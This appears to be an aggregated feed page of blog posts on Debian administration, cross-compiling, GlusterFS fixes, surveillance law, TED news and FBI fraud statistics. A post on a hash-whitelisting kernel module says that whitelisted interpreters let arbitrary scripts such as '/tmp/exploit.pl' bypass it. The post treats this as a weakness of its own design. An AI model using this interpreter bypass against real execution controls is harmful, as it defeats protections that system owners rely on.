  • When a binary is executed, the SHA-1 hash of the file's contents is calculated.
  • If that matches the value stored in an extended attribute the execution is permitted.
    • If the extended-attribute is missing, or the checksum doesn't match, then the execution is denied.

In practice this is the same behaviour as the previous LSM - a binary is either executable, because there is a good hash, or it is not, because the hash is missing or bogus. If somebody deploys a binary rootkit this will definitely stop it from executing, but of course there is a huge hole - scripting languages:

  • If /usr/bin/perl is whitelisted then /usr/bin/perl /tmp/exploit.pl will succeed.
  • If /usr/bin/python is whitelisted then the same applies.

Despite that, the project was worthwhile: I can clearly describe what it is designed to achieve ("Deny the execution of unknown binaries" and "Deny binaries that have been modified"), and I learned how to hash a file from kernel-space - which was surprisingly simple.

(Yes I know about IMA and EVM - this was a simple project for learning purposes. Public-key signatures will be something I'll look at next/soon/later. :)

Perhaps the only other thing to explore is the complexity in allowing/denying actions based on the user - in a human-readable fashion, not via UIDs. So www-data can execute some programs, alice can run a different set of binaries, and git can only run /usr/bin/git.

Of course down that path lies apparmour, selinux, and madness..

Planet DebianIngo Juergensmann: Upgrade to Debian Stretch - GlusterFS fails to mount

Before I upgraded from Jessie to Stretch, everything worked like a charm with glusterfs in Debian. But after I upgraded the first VM to Debian Stretch I discovered that glusterfs-client was unable to mount the storage on Jessie servers. I got this in the glusterfs log:

[2017-06-24 12:51:53.240389] I [MSGID: 100030] [glusterfsd.c:2454:main] 0-/usr/sbin/glusterfs: Started running /usr/sbin/glusterfs version 3.8.8 (args: /usr/sbin/glusterfs --read-only --fuse-mountopts=nodev,noexec --volfile-server=192.168.254.254 --volfile-id=/le --fuse-mountopts=nodev,noexec /etc/letsencrypt.sh/certs)
[2017-06-24 12:51:54.534826] E [mount.c:318:fuse_mount_sys] 0-glusterfs-fuse: ret = -1

[2017-06-24 12:51:54.534896] I [mount.c:365:gf_fuse_mount] 0-glusterfs-fuse: direct mount failed (Invalid argument) errno 22, retry to mount via fusermount
[2017-06-24 12:51:56.668254] I [MSGID: 101190] [event-epoll.c:628:event_dispatch_epoll_worker] 0-epoll: Started thread with index 1
[2017-06-24 12:51:56.671649] E [glusterfsd-mgmt.c:1590:mgmt_getspec_cbk] 0-glusterfs: failed to get the 'volume file' from server
[2017-06-24 12:51:56.671669] E [glusterfsd-mgmt.c:1690:mgmt_getspec_cbk] 0-mgmt: failed to fetch volume file (key:/le)
[2017-06-24 12:51:57.014502] W [glusterfsd.c:1327:cleanup_and_exit] (-->/usr/lib/x86_64-linux-gnu/libgfrpc.so.0(rpc_clnt_handle_reply+0x90) [0x7fbea36c4a20] -->/usr/sbin/glusterfs(mgmt_getspec_cbk+0x494) [0x55fbbaed06f4] -->/usr/sbin/glusterfs(cleanup_and_exit+0x54) [0x55fbbaeca444] ) 0-: received signum (0), shutting down
[2017-06-24 12:51:57.014564] I [fuse-bridge.c:5794:fini] 0-fuse: Unmounting '/etc/letsencrypt.sh/certs'.
[2017-06-24 16:44:45.501056] I [MSGID: 100030] [glusterfsd.c:2454:main] 0-/usr/sbin/glusterfs: Started running /usr/sbin/glusterfs version 3.8.8 (args: /usr/sbin/glusterfs --read-only --fuse-mountopts=nodev,noexec --volfile-server=192.168.254.254 --volfile-id=/le --fuse-mountopts=nodev,noexec /etc/letsencrypt.sh/certs)
[2017-06-24 16:44:45.504038] E [mount.c:318:fuse_mount_sys] 0-glusterfs-fuse: ret = -1

[2017-06-24 16:44:45.504084] I [mount.c:365:gf_fuse_mount] 0-glusterfs-fuse: direct mount failed (Invalid argument) errno 22, retry to mount via fusermount

After some searching on the Internet I found Debian #858495, but no solution for my problem. Some search results recommended setting "option rpc-auth-allow-insecure on", but this didn't help. In the end I joined #gluster on Freenode and got some hints there:

JoeJulian | ij__: debian breaks apart ipv4 and ipv6. You'll need to remove the ipv6 ::1 address from localhost in /etc/hosts or recombine your ip stack (it's a sysctl thing)
JoeJulian | It has to do with the decisions made by the debian distro designers. All debian versions should have that problem. (yes, server side).

Removing ::1 from /etc/hosts and from the lo interface did the trick, and I could mount glusterfs storage from Jessie servers in my Stretch VMs again. However, when I upgraded the glusterfs storages to Stretch as well, this "workaround" didn't work anymore. Some more searching on the Internet led me to this posting on the glusterfs mailing list:

We had seen a similar issue and Rajesh has provided a detailed explanation on why at [1]. I'd suggest you to not to change glusterd.vol but execute "gluster volume set <volname> transport.address-family inet" to allow Gluster to listen on IPv4 by default.

Setting this option instantly fixed my issues with mounting glusterfs storages.

So, whatever is wrong with glusterfs in Debian, it seems to have something to do with IPv4 and IPv6. When disabling IPv6 in glusterfs, it works. I added information to #858495.


Planet DebianRiku Voipio: Cross-compiling with debian stretch

Debian stretch comes with cross-compiler packages for selected architectures:
 $ apt-cache search cross-build-essential
crossbuild-essential-arm64 - Informational list of cross-build-essential packages for
crossbuild-essential-armel - ...
crossbuild-essential-armhf - ...
crossbuild-essential-mipsel - ...
crossbuild-essential-powerpc - ...
crossbuild-essential-ppc64el - ...

Let's have a quick exact-steps guide. But first - while you could do all this in your desktop PC rootfs, it is wiser to contain yourself. Fortunately, Debian comes with a container tool out of the box:

sudo debootstrap stretch /var/lib/container/stretch http://deb.debian.org/debian
echo "stretch_cross" | sudo tee /var/lib/container/stretch/etc/debian_chroot
sudo systemd-nspawn -D /var/lib/container/stretch
Then we set up a cross-building environment for arm64 inside the container:

# Tell dpkg we can install arm64
dpkg --add-architecture arm64
# Add src line to make "apt-get source" work
echo "deb-src http://deb.debian.org/debian stretch main" >> /etc/apt/sources.list
apt-get update
# Install cross-compiler and other essential build tools
apt install --no-install-recommends build-essential crossbuild-essential-arm64
Now that we have a nice build environment, let's choose something more complicated than the usual kernel/BusyBox to cross-build: qemu.

# Get qemu sources from debian
apt-get source qemu
cd qemu-*
# New in stretch: build-dep works in unpacked source tree
apt-get build-dep -a arm64 .
# Cross-build Qemu for arm64
dpkg-buildpackage -aarm64 -j6 -b
Now that works perfectly for Qemu. For other packages, challenges may appear. For example, you may have to set the "nocheck" flag to skip build-time unit tests. Or some of the build-dependencies may not be multiarch-enabled. So work continues :)
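As a sketch of that "nocheck" escape hatch (nocheck is a standard DEB_BUILD_OPTIONS flag honoured by most packages' debian/rules; the invocation mirrors the qemu build above):

```shell
# Skip build-time unit tests that cannot run under cross-compilation.
export DEB_BUILD_OPTIONS=nocheck
# Then cross-build as before:
dpkg-buildpackage -aarm64 -j6 -b
```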

CryptogramAmazon Patents Measures to Prevent In-Store Comparison Shopping

Amazon has been issued a patent on security measures that prevent people from comparison shopping while in the store. It's not a particularly sophisticated patent -- it basically detects when you're using the in-store Wi-Fi to visit a competitor's site and then blocks access -- but it is an indication of how retail has changed in recent years.

What's interesting is that Amazon is on the other side of this arms race. As an on-line retailer, it wants people to walk into stores and then comparison shop on its site. Yes, I know it's buying Whole Foods, but it's still predominantly an online retailer. Maybe it patented this to prevent stores from implementing the technology.

It's probably not nearly that strategic. It's hard to build a business strategy around a security measure that can be defeated with cellular access.

Planet Linux AustraliaLev Lafayette: Duolingo Plus is Extremely Broken

After using Duolingo for over a year and accumulating almost 100,000 points, I thought I would do the right thing and pay for the Plus service. It was exactly the right time, as I would be travelling overseas and the ability to do lessons offline and have them sync later seemed ideal.

For the first few days it seemed to be operating fine; I had downloaded the German tree and was working my way through it. Then I downloaded the French tree, and several problems started to emerge.


Planet DebianNorbert Preining: Calibre 3 for Debian

I have updated my Calibre Debian repository to include packages of the current Calibre 3.1.1. As with the previous packages, I kept RAR support in to allow me to read comic books. I have also forwarded my changes to the maintainer of Calibre in Debian, so maybe we will soon have official packages, too.

The repository location hasn’t changed, see below.

deb http://www.preining.info/debian/ calibre main
deb-src http://www.preining.info/debian/ calibre main

The releases are signed with my Debian key 0x6CACA448860CDC13

Enjoy

,

Planet DebianJoachim Breitner: The perils of live demonstrations

Yesterday, I was giving a talk at the South SF Bay Haskell User Group about how implementing lock-step simulation is trivial in Haskell and how Chris Smith and I are using this to make CodeWorld even more attractive to students. I gave the talk before, at Compose::Conference in New York City earlier this year, so I felt well prepared. On the flight to the West Coast I slightly extended the slides, and as I was too cheap to buy in-flight WiFi, I tested them only locally.

So I arrived at the offices of Target1 in Sunnyvale, got on the WiFi, uploaded my slides, which are in fact one large interactive CodeWorld program, and tried to run it. But I got a type error…

Turns out that the API of CodeWorld was changed just the day before:

commit 054c811b494746ec7304c3d495675046727ab114
Author: Chris Smith <cdsmith@gmail.com>
Date:   Wed Jun 21 23:53:53 2017 +0000

    Change dilated to take one parameter.
    
    Function is nearly unused, so I'm not concerned about breakage.
    This new version better aligns with standard educational usage,
    in which "dilation" means uniform scaling.  Taken as a separate
    operation, it commutes with rotation, and preserves similarity
    of shapes, neither of which is true of scaling in general.

Ok, that was quick to fix, and the CodeWorld server started to compile my code, and compiled, and aborted. It turned out that my program, presumably the largest CodeWorld interaction out there, hit the time limit of the compiler.

Luckily, Chris Smith just arrived at the venue, and he emergency-bumped the compiler time limit. The program compiled and I could start my presentation.

Unfortunately, the biggest blunder was still awaiting me. I came to the slide where two instances of pong are played over a simulated network, and my point was that the two instances are perfectly in sync. Unfortunately, they were not. I guess it did support my point that lock-step simulation can easily go wrong, but it really left me out in the rain there, and I could not explain it – I had not modified this code since New York, and there it worked flawlessly2. In the end, I could save my face a bit by running the real pong game against an attendee over the network, and no desynchronisation could be observed there.

Today I dug into it and it took me a while, and it turned out that the problem was not in CodeWorld, or the lock-step simulation code discussed in our paper about it, but in the code in my presentation that simulated the delayed network messages; in some instances it would deliver the UI events in a different order to the two simulated players, and hence cause them to do something different. Phew.


  1. Yes, the retail giant. Turns out that they have a small but enthusiastic Haskell-using group in their IT department.

  2. I hope the video is going to be online soon, then you can check for yourself.

CryptogramFriday Squid Blogging: Injured Giant Squid Video

A paddleboarder had a run-in with an injured giant squid. Video. Here's the real story.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

Read my blog posting guidelines here.

Planet DebianJoey Hess: PV array is hot

Only took a couple hours to wire up and mount the combiner box.

PV combiner box with breakers

Something about larger wiring like this is enjoyable. So much less fiddly than what I'm used to.

PV combiner box wiring

And the new PV array is hot!

multimeter reading 66.8 VDC

Update: The panels have an open circuit voltage of 35.89 and are in strings of 2, so I'd expect to see 71.78 V with only my multimeter connected. So I'm losing 0.07 volts to wiring, which is less than I designed for.
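The arithmetic above can be sanity-checked in one line (values taken from the post):

```shell
# Expected open-circuit voltage: per-panel Voc of 35.89 V, 2 panels per string.
awk 'BEGIN { voc = 35.89; panels = 2; printf "%.2f\n", voc * panels }'
# → 71.78
```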

Cory DoctorowCanada: Trump shows us what happens when “good” politicians demand surveillance powers

The CBC asked me to write an editorial for their package about Canadian identity and politics, timed with the 150th anniversary of the founding of the settler state on indigenous lands. They’ve assigned several writers to expand on themes in the Canadian national anthem, and my line was “We stand on guard for thee.”

I wrote about bill C-51, a reckless, sweeping mass surveillance bill that now-PM Trudeau got his MPs to support when he was in opposition, promising to reform the bill once he came to power.


The situation is analogous to Barack Obama’s history with mass surveillance in the USA: when Obama was a Senator, he shepherded legislation to immunize the phone companies for their complicity with illegal spying under GW Bush, promising to fix the situation when he came to power. Instead, he built out a fearsome surveillance apparatus that he handed to the paranoid, racist Donald Trump, who now gets to use that surveillance system to target his enemies, including 11 million undocumented people in America, and people of Muslim origin.


Now-PM Justin Trudeau has finally tabled some reforms to C-51, but they leave the bill’s worst provisions intact. Even if Canadians trust Trudeau to use these spying powers wisely, they can’t afford to bet that Trudeau’s successors will not abuse them.


Within living memory, our loved ones were persecuted, hounded to suicide, imprisoned for activities that we recognize today as normal and right: being gay, smoking pot, demanding that settler governments honour their treaties with First Nations. The legitimization of these activities only took place because we had a private sphere in which to agitate for them.

Today, there are people you love, people I love, who sorrow over their secrets about their lives and values and ambitions, who will go to their graves with that sorrow in their minds — unless we give them the private space to choose the time and manner of their disclosure, so as to maximize the chances that we will be their allies in their struggles. If we are to stand on guard for the future of Canada, let us stand on guard for these people, for they are us.


What happens after the ‘good’ politicians give away our rights? Cory Doctorow shares a cautionary tale.

[Cory Doctorow/CBC]


(Image:
Jean-Marc Carisse, CC-BY; Trump’s Hair)

CryptogramThe Secret Code of Beatrix Potter

Interesting:

As codes go, Potter's wasn't inordinately complicated. As Wiltshire explains, it was a "mono-alphabetic substitution cipher code," in which each letter of the alphabet was replaced by a symbol­ -- the kind of thing they teach you in Cub Scouts. The real trouble was Potter's own fluency with it. She quickly learned to write the code so fast that each sheet looked, even to Linder's trained eye, like a maze of scribbles.
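A monoalphabetic substitution cipher of the kind described is easy to sketch: each letter maps to exactly one fixed substitute. ROT13 via tr(1) is the classic shell example (Potter used invented symbols rather than shifted letters):

```shell
# Each letter is replaced by its fixed partner 13 places along the alphabet.
echo "The tale of Peter Rabbit" | tr 'A-Za-z' 'N-ZA-Mn-za-m'
# → Gur gnyr bs Crgre Enoovg
```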

TEDWhy TED takes two weeks off every summer

TED.com is about to go quiet for two weeks. No new TED Talks will be posted on the web until Monday, July 10, 2017, while most of the TED staff takes our annual two-week vacation.

Yes, we all (or almost all) go on vacation at the same time. No, we don’t all go to the same place.

We’ve been doing it this way now for eight years. Our summer break is a little lifehack that solves the problem of a company in perpetual-startup mode where something new is always going on and everyone has raging FOMO. We avoid the fear of missing out on emails and new projects and blah blah blah … by making sure that nothing is going on.

I love how the inventor of this holiday, TED’s founding head of media June Cohen, once explained it: “When you have a team of passionate, dedicated overachievers, you don’t need to push them to work harder, you need to help them rest. By taking the same two weeks off, it makes sure everyone takes vacation,” she said. “Planning a vacation is hard — most of us still feel a little guilty to take two weeks off, and we’d be likely to cancel when something inevitably comes up. This creates an enforced rest period, which is so important for productivity and happiness.”

Bonus: “It’s efficient,” she said. “In most companies, people stagger their vacations through the summer. But this means you can never quite get things done all summer long. You never have all the right people in the room.”

So, as the bartender said: You don’t have to go home, but you can’t stay here. We won’t post new TED Talks on the web for the next two weeks. (Though — check out audio talks on iTunes, where we’re curating two weeks of talks on the theme of Journeys.) The office is three-quarters empty. And we stay off email. The whole point is that vacation time should be truly restful, and we should be able to recharge without having to check in or worry about what we’re missing back at the office.

See you on Monday, July 10!

Note: This piece was first posted on July 17, 2014. It was updated on July 27, 2015, again on July 20, 2016, and again on June 23, 2017.


LongNowThe Artangel Longplayer Letters: Iain Sinclair writes to Alan Moore

Iain Sinclair (left) chose Alan Moore as the recipient of his Longplayer letter.


In November 02015, Manuel Arriaga wrote a letter to Giles Fraser as part of the Artangel Longplayer Letters series. The series is a relay-style correspondence: The first letter was written by Brian Eno to Nassim Taleb. Nassim Taleb then wrote to Stewart Brand, and Stewart wrote to Esther Dyson, who wrote to Carne Ross, who wrote to John Burnside, who wrote to Manuel Arriaga, who wrote to Giles Fraser, which remains unanswered.

In June 02017, the Longplayer Trust initiated a new correspondence, beginning with Iain Sinclair, a writer and filmmaker whose recent work focuses on the psychogeography of London, writing to graphic novel writer Alan Moore, who will respond with a letter to a recipient of his choosing.

The discussion thus far has focused on the extent and ways government and technology can foster long-term thinking. You can find the previous correspondences here.


Hackney: 30 January 2017

Dear Alan,

We are being invited, by means of predatory technologies neither of us advocate or employ, to consider ‘long-term thinking’. But already I’m coughing up the fishbone of that hyphen and going into electroconvulsive spasms over this requirement to think about thinking – and at a late stage in my own terrestrial transit when I know all too well that there is no longterm. The diminishing future, protected by a feeble envelope of identity, has already been used up, wantonly. And the past was always a looped mistake plaguing us with repeated flares of shame. Those smells and textures, wet and warm, cabbage and custard, get sharper even as our faculties fail. I pick them up very easily by fingering the close-planted acres of your Jerusalem. The first great English scratch-and-sniff epic.

“And now,” as Sebald said, “I am living the wrong life.” Having tried, for too many years, to muddy the waters with untrustworthy fictions and ‘alternative truths’, books that detoured into other books, I am now colonised by longplaying images and private obsessions, vinyl ghosts in an unmapped digital multiverse. This is the fate we must accept, some more gratefully than others, before we let the whole slithery viscous mess go and sink into nothingness.

“Unexplained but not suspicious,” they concluded about the premature death of George Michael. They could, just as easily, have been talking about his life. About all our lives.

I remember Jeremy Prynne, when I first came across him, being affronted (and amused) by a request from a Canadian academic/poet for: ‘an example of your thought’. ‘Like a lump of basalt,’ he snorted. Reaching for his geological toffee-hammer. Thinking was something else: an energy field, a process that happened outside and beyond the will of the thinker. Like snow. Or waves. Or television. And with the unstated aim of eliminating egoic interference. A solitary amputated ‘thought’, framed for display, would be as horrifying as that morning radio interlude when listeners channel-hop or make their cups of tea: Thought for the Day. Hospital homilies with ecumenical bent for an immobile and chemically-coshed constituency.

But I do think (misrepresent, subvert) about a notion you once expressed: time as a solid. ‘Eternalism’ as a sort of Swedenborgian block – like a form of discontinued public housing in which pastpresentfuture coexist, shoulder-to-shoulder: legions of the persistent and half-erased dead, fictional avatars more real now than their creators, the unborn, aborted and nearly-born, and the vegetative buddhas on hard benches, all whispering and jabbering and going about their meaningless business. Each of them invisible to the others. Probably in Northampton. Probably in a few streets of Northampton. Your beloved Boroughs. Which are also burrows (and Burroughs). They are hidden in plain sight in that narcoleptic trance between slow-waking and swift-dying, adrift in the nuclear fusion of dusk and dawn. In moving meadows by some unmoving river. They sweat uphill on arterial roads: tramps, pilgrims, levellers, ranters, bootmakers, working mothers festooned with infants, prostitutes, immigrants, damaged seers and local artists, incarcerated poets and skewed uncles around a snooker table in some defunct and cobwebby Labour Club. And all the ones who are still waiting to become Alan Moore.

“The living can assist the imagination of the dead,” Yeats wrote in A Vision. I started my journey through London with that sentence and I’ve never got beyond it. The ambition remains: to be ventriloquised, tapped, channelled. “Life rewritten by life,” as Brian Catling puts it. Longterm is a deranged Xerox printer spewing out copies of copies, until the image is bleached to snowblind illegibility. Examine any seriously popular production, any universally endorsed philosophy, and you can peel it back, layer by layer, to some obscure and unheralded madman in a cluttered cabin, muttering to himself and sketching occulted diagrams of influences and interconnections. Successive reboots bring the unspeakable (better left in silence) closer to the ear, a process infinitely accommodated now by the speed of the digital web. Where nothing is true and none of it matters. And you finish with Donald Trump. Ubu of the internet.

“The illusion of mortality, post-Einstein,” you say. The neighbourly undead patrol their limitless limits: “soiled simultaneity.” That pregnant now in which the past is struggling to suppress its dreadful future. To escape the cull of gravity.  I have never been able to deal in abstractions. I like detail, glinting particulars. Anecdotes.

After noticing uniformed kids tramping, every morning, to their flatpack Academy by the canal, infested with hissing earworms, Nuremberg headphones, tablets held out in front of them like tiny trays of cocktail sausages, I registered a boy and a girl talking very quietly, not wanting to break the concentration of an older girl – who is reading as she walks: James Joyce. And, at the same time, under a Shoreditch railway bridge, there appeared, above a set of recycling bins (‘Trade Mixed Glass’), a portrait of the Ulysses author, with one blackened lens and an unnecessary title: REBEL. Which set me ‘thinking’ about your Jerusalem and the way you tap Lucia Joyce, or recover the aftershock of her Northampton confinement by total immersion in the Babel of Finnegans Wake. Your speculative punt calls up the Burroughs notion of the ‘image vine’: once you have committed to a single image (or word), the next one is fated to follow. By the time of those methadone-managed twilight years in Kansas, Burroughs had exorcised the demons that made him write, the karma of shooting his wife in Mexico City. He used up the days that were left in attending to his cats, making splat-art with his guns and recording his dreams.

“Couldn’t find my room as usual in the Land of the Dead. Followed by bounty hunters.” Postmortem, Bill is still looking for trigger episodes. “It seems that cities are being moved from one place to another.” The Place of Dead Roads, he calls it. And in Jerusalem, you catch very well those freaks of random, punctured illumination. “Each vital second of her life was there as an exquisite moving miniature, filled with the most intense significance and limned in colours so profound they blazed, yet not set in any noticeable order.”

My hunch is this: that Eternalism, the long-player’s ultimate longplay, is located in residues of sleep, in the community of sleepers, between worlds, beyond mortality. I dreamed my genesis in sweat of sleep. There was a dream, one of a series, that I failed to record, but which felt like a reprise of aspects of that film with which we were both involved, The Cardinal and the Corpse. So many of the cast are now dead, locked up, disappeared, but still in play, their voices, their persons, that they secure territory (and time), a privileged past. We were in the Princelet Street synagogue, climbing the stairs (as you did in that house with the peeling pink door), towards an attic chamber that was also a curtained confessional box. With Chris Petit, obviously, as the hovering cardinal (actually a madhouse keeper from Sligo). We managed a ritual exchange of velvet cricket caps before the world outside the window started to spin, day to night, years to centuries, stars going out, suns born, like The House on the Borderland. Martin Stone, laying out a pattern of white lines on his black case, told us that he had just found, in an abandoned villa outside Nice, a lavishly inscribed copy of the first edition that once belonged to Aleister Crowley. But he had decided to keep it.

If the integrity of time breaks down, place is confirmed. I’m thinking about the Northampton Boroughs, about your friend and mentor, Steve Moore, on Shooter’s Hill. And how Steve sourced the dream of what would happen, his abrupt transference, while sticking around, polishing the Japanese energy shield, long enough to confirm his own predictions, and to allow others to appreciate the narrative arc of his death. That long, long preparation – in vision and domestic reality – you describe in City of Disappearances.

The trick then, the quest we’re all on, is to identify and honour those neural pathways: the trench you print out in Jerusalem, worn by steel-shod boots, between Northampton and Lambeth. The fugue of movement. A man who is here. Who vanishes. And reappears. Is he the same? Are you? Something carries this walker, like John Clare, out on an English road: foot-foundered, gobbling at verges, sleeping in ditches. In the expectation of reconnecting with an extinguished muse: youth, innocence, desire. That is the only longplay I have encountered: one journey fading into the next. No thought. No thinking. Drift. Reverie. As you say, ‘Panoramic portrait over lofty landscape.’ Every time.


Iain Sinclair was born in Cardiff. He left almost immediately. He has lived and worked around Hackney for almost 50 years, but the local terrain is as strange and enticing as ever. Books – including Lud Heat, Downriver, London Orbital and American Smoke – have been published. And there have been filmic collaborations with Chris Petit and Andrew Kötting, among others. Sinclair has recently completed The Last London, the final volume in a long sequence.

Alan Moore was born in Northampton in 1953 and is a writer, performer, recording artist, activist and magician. His comic-book work includes Lost Girls with Melinda Gebbie, From Hell with Eddie Campbell and The League of Extraordinary Gentlemen with Kevin O’Neill. He has worked with director Mitch Jenkins on the Showpieces cycle of short films and on the forthcoming feature film The Show, while his novels include Voice of the Fire (1996) and his current epic Jerusalem (2016). Only about half as frightening as he looks, he lives in Northampton with his wife and collaborator Melinda Gebbie.

TEDTEDWomen update: Black Lives Matter wins Sydney Peace Prize

Founders of the Black Lives Matter movement — from left, Alicia Garza, Patrisse Cullors and Opal Tometi, interviewed onstage by TEDWomen cohost Mia Birdsong at TEDWomen 2016 in San Francisco. Photo: Marla Aufmuth / TED

Cross-posted from TEDWomen curator Pat Mitchell’s blog on the Huffington Post.

Last month, the Black Lives Matter movement was awarded the Sydney Peace Prize, a global prize that honors those who pursue “peace with justice.” Past honorees include South African Archbishop Desmond Tutu and Irish President Mary Robinson.

The prize “recognizes the vital contributions of leading global peacemakers, creates a platform so that their voices are heard, and supports their vital work for a fairer world.” Winners receive $50,000 to help them continue their work.

One of the highlights of last year’s TEDWomen was a conversation with Black Lives Matter founders Alicia Garza, Patrisse Cullors and Opal Tometi. They spoke with Mia Birdsong about the movement and their commitment to working collaboratively for change. As Tometi told Birdsong: “We need to acknowledge that different people contribute different strengths, and that in order for our entire team to flourish, we have to allow them to share and allow them to shine.”

This year’s TEDWomen conference (registration is open), which will be held in New Orleans November 1–3, 2017, will expand on many of the themes Garza, Cullors, Tometi and Birdsong touched on during their conversation last year. This year’s conference theme is Bridges — and we’ll be looking at how individuals and organizations create bridges between races, cultures, people, and places — and, as modeled by the Black Lives Matter movement, how we build bridges to a more equal and just world.

In announcing the award, the Sydney Peace Foundation said, “This is the first time that a movement and not a person has been awarded the peace prize — a timely choice. Climate change is escalating fast, increasing inequality and racism are feeding divisiveness, and we are in the middle of the worst refugee crisis since World War II. Yet many establishment leaders across the world stick their heads in the sand or turn their backs on justice, fairness and equality.”

Founders Garza, Cullors and Tometi will travel to Australia later this year to formally accept the prize.

Congratulations to them!


Planet DebianElena 'valhalla' Grandi: On brokeness, the live installer and being nice to people

This morning I've read this post: blog.einval.com/2017/06/22#tro.

I understand that somebody on the internet will always be trolling, but I just wanted to point out:

* that the installer in the old live images has been broken (for international users) for years
* that nobody cared enough to fix it, not even the people affected by it (the issue was reported as known in various forums, but for a long time nobody even opened an issue to let the *developers* know).

Compare this with the current situation, with people doing multiple tests as the (quite big number of) images were being built, and a fix released soon after for the issues found.

I'd say that this situation is great, and that instead of trolling around we should thank the people involved in this release for their great job.

Planet DebianJonathan Dowland: WD drive head parking update

An update for my post on Western Digital Hard Drive head parking: disabling the head-parking completely stopped the Load_Cycle_Count S.M.A.R.T. attribute from incrementing. This is probably at the cost of power usage, but I am not able to assess the impact of that as I'm not currently monitoring the power draw of the NAS (Although that's on my TODO list).
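The attribute can be watched like so. This is a sketch: the device path in the comment is an assumption, and a sample line stands in for real `smartctl -A` output:

```shell
# Extract the raw Load_Cycle_Count value to watch whether it keeps
# incrementing. On a real NAS you would run:
#   smartctl -A /dev/sda | awk '/Load_Cycle_Count/ { print $NF }'
# The sample line below mimics smartctl's attribute-table format.
sample='193 Load_Cycle_Count        0x0032   199   199   000    Old_age   Always       -       5123'
echo "$sample" | awk '/Load_Cycle_Count/ { print $NF }'
# → 5123
```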

Sociological ImagesIs it ethical to give your child “every advantage”?

Flashback Friday.

Stiff competition for entrance to private preschools and kindergartens in Manhattan has created a test prep market for children under 5. The New York Times profiled Bright Kids NYC. The owner confesses that “the parents of the 120 children her staff tutored [in 2010] spent an average of $1,000 on test prep for their 4-year-olds.”  This, of course, makes admission to schools for the gifted a matter of class privilege as well as intelligence.

The article also tells the story of a woman without the resources to get her child, Chase, professional tutoring:

Ms. Stewart, a single mom working two jobs, didn’t think the process was fair. She had heard widespread reports of wealthy families preparing their children for the kindergarten gifted test with $90 workbooks, $145-an-hour tutoring and weekend “boot camps.”

Ms. Stewart used a booklet the city provided and reviewed the 16 sample questions with Chase. “I was online trying to find sample tests,” she said. “But everything was $50 or more. I couldn’t afford that.”

Ms. Stewart can’t afford tutoring for Chase; other parents can. It’s unfair that entrance into kindergarten level programs is being gamed by people with resources, disadvantaging the most disadvantaged kids from the get go. I think many people will agree.

But the more insidious value, the one that almost no one would identify as problematic, is the idea that all parents should do everything they can to give their child advantages. Even Ms. Stewart thinks so. “They want to help their kids,” she said. “If I could buy it, I would, too.”

Somehow, in the attachment to the idea that we should all help our kids get every advantage, the fact that advantaging your child disadvantages other people’s children gets lost.  If it advantages your child, it must be advantaging him over someone else; otherwise it’s not an advantage, you see?

I felt like this belief (that you should give your child every advantage) and its invisible partner (that doing so is hurting other people’s children) were rife in the FAQs on the Bright Kids NYC website.

Isn’t my child too young to be tutored?

These programs are very competitive, the answers say, and you need to make sure your kid does better than other children.  It’s never too soon to gain an advantage.

My child is already bright, why does he or she need to be prepared?

Because being bright isn’t enough.  If you get your kid tutoring, she’ll be able to show she’s bright in exactly the right way. All those other bright kids that can’t get tutoring won’t get in because, after all, being bright isn’t enough.

Is it fair to “prep” for the standardized testing?

Of course it’s fair, the website claims!  It’s not only fair, it’s “rational”!  What parent wouldn’t give their child an advantage!?  They avoid actually answering the question. Instead, they make kids who don’t get tutoring invisible and then suggest that you’d be crazy not to enroll your child in the program.

My friend says that her child got a very high ERB [score] without prepping.  My kid should be able to do the same.

Don’t be foolish, the website responds. This isn’t about being bright, remember. Besides, your friend is lying. They’re spending $700,000 on their kid’s schooling (aren’t we all!?) and we can’t disclose our clients but, trust us, they either forked over a grand to Bright Kids NYC or test administrators.

Test prep for kindergartners seems like a pretty blatant example of class privilege. But, of course, the argument that advantaging your own kid necessarily involves disadvantaging someone else’s applies to all sorts of things, from tutoring, to a leisurely summer with which to study for the SAT, to financial support during their unpaid internships, to helping them buy a house and, thus, keeping home prices high.

I think it’s worth re-evaluating. Is giving your kid every advantage the moral thing to do?

Lisa Wade, PhD is a professor at Occidental College. She is the author of American Hookup, a book about college sexual culture, and a textbook about gender. You can follow her on Twitter, Facebook, and Instagram.

(View original at https://thesocietypages.org/socimages)

Planet DebianBits from Debian: Hewlett Packard Enterprise Platinum Sponsor of DebConf17

HPElogo

We are very pleased to announce that Hewlett Packard Enterprise (HPE) has committed support to DebConf17 as a Platinum sponsor.

"Hewlett Packard Enterprise is excited to support Debian's annual developer conference again this year", said Steve Geary, Senior Director R&D at Hewlett Packard Enterprise. "As Platinum sponsors and member of the Debian community, HPE is committed to supporting Debconf. The conference, community and open distribution are foundational to the development of The Machine research program and will bring our Memory Driven Computing agenda to life."

HPE is one of the largest computer companies in the world, providing a wide range of products and services, such as servers, storage, networking, consulting and support, software, and financial services.

HPE is also a development partner of Debian, and provides hardware for port development, Debian mirrors, and other Debian services (hardware donations are listed in the Debian machines page).

With this additional commitment as Platinum Sponsor, HPE helps make our annual conference possible, and directly supports the progress of Debian and Free Software, strengthening the community that continues to collaborate on Debian projects throughout the rest of the year.

Thank you very much Hewlett Packard Enterprise, for your support of DebConf17!

Become a sponsor too!

DebConf17 is still accepting sponsors. Interested companies and organizations may contact the DebConf team through sponsors@debconf.org, and visit the DebConf17 website at https://debconf17.debconf.org.

Krebs on SecurityFBI: Extortion, CEO Fraud Among Top Online Fraud Complaints in 2016

Online extortion, tech support scams and phishing attacks that spoof the boss were among the most costly cyber scams reported by consumers and businesses last year, according to new figures from the FBI’s Internet Crime Complaint Center (IC3).

The IC3 report released Thursday correctly identifies some of the most prevalent and insidious forms of cybercrimes today, but the total financial losses tied to each crime type also underscore how infrequently victims actually report such crimes to law enforcement.

Source: Internet Crime Complaint Center (IC3).

For example, the IC3 said it received 17,146 extortion-related complaints, with an adjusted financial loss totaling just over $15 million. In that category, the report identified 2,673 complaints identified as ransomware — malicious software that scrambles a victim’s most important files and holds them hostage unless and until the victim pays a ransom (usually in a virtual currency like Bitcoin).

According to the IC3, the losses associated with those ransomware complaints totaled slightly more than $2.4 million. Writing for BleepingComputer.com — a tech support forum I’ve long recommended that helps countless ransomware victims — Catalin Cimpanu observes that the FBI’s ransomware numbers “are ridiculously small compared to what happens in the real world, where ransomware is one of today’s most prevalent cyber-threats.”

“The only explanation is that people are paying ransoms, restoring from backups, or reinstalling PCs without filing a complaint with authorities,” Cimpanu writes.

It’s difficult to know what percentage of ransomware victims paid the ransom or were able to restore from backups, but one thing is for sure: Relatively few victims are reporting cyber fraud to federal investigators.

